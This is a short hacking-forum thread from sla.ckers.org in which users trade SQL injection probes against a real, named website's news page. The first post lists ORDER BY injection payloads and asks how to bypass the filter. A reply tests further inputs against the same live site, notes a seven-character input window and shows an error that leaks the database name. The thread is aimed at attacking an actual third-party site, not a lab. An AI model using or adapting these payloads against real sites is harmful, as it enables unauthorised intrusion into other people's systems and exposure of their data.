Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Order by Pass???
Posted by: xxy
Date: August 21, 2013 03:15PM

http://www.stha.ca/news/index_full.php?id=38 order 1--

http://www.stha.ca/news/index_full.php?id=38' order 11111--+

http://www.stha.ca/news/index_full.php?id=38) order 11111--+

????

Options: ReplyQuote
Re: Order by Pass???
Posted by: pridzx
Date: September 09, 2013 12:26AM

thank you for goods.

Options: ReplyQuote
Re: Order by Pass???
Posted by: firestorm
Date: September 17, 2013 11:14AM

Bad luck.

Thats only 7 character window you have there.
www.stha.ca/news/index_full.php?id=38++++'
=> Error

Anything beyong 7 is kinda, neglected.

http://www.stha.ca/news/index_full.php?id=38+++++++'
=> null or something..

So what can you buy in 7 char ?

www.stha.ca/news/index_full.php?id=38a()
=> FUNCTION srhb.38a does not exist in.....

Just the db name!

In case of asap, reach me by mail : syed@syedafzal.in

Options: ReplyQuote


Sorry, only registered users may post in this forum.